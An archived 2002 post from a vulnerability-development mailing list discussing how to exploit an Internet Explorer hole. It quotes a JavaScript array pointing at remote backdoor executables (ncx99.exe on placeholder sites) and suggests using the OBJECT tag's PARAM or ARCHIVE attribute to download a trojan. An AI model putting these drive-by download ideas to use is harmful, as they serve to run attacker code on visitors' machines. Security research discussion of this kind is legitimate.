Vulnerability Development mailing list archives

Re: Rather large MSIE-hole


From: Joerg Over <over () dexia de>
Date: Fri, 15 Mar 2002 10:27:34 +0100

Hello ...

What about, generally, not tackling the programName array trying to stuff
params into it, but the <OBJECT> instead?

At 17:48 14.03.02 -0500 you wrote:
->Another thought... will this bug run an executable from a web page? If 
->so you could just make your own binary to do whatever you wanted. Like 
->http://mysiteathome.com/malware.exe or something along those lines. I 
->would HOPE that it asks to save the file to disk or even better ignore 
->it altogether. Maybe try something like:
->
->var programName=new Array(
->    'http://mysiteathome.com/ncx99.exe',
->    'http://someothersite.com/ncx99.exe',
->);


One could maybe try the <PARAM NAME=> - tag to pass parameters. Dunno how
that's transported to the object, though.
Another attempt might be using the ARCHIVE - attribute of the OBJECT to
download the trojan (or batchfile if you will, like has been proposed
here), so you don't need params.


greetings, -jo

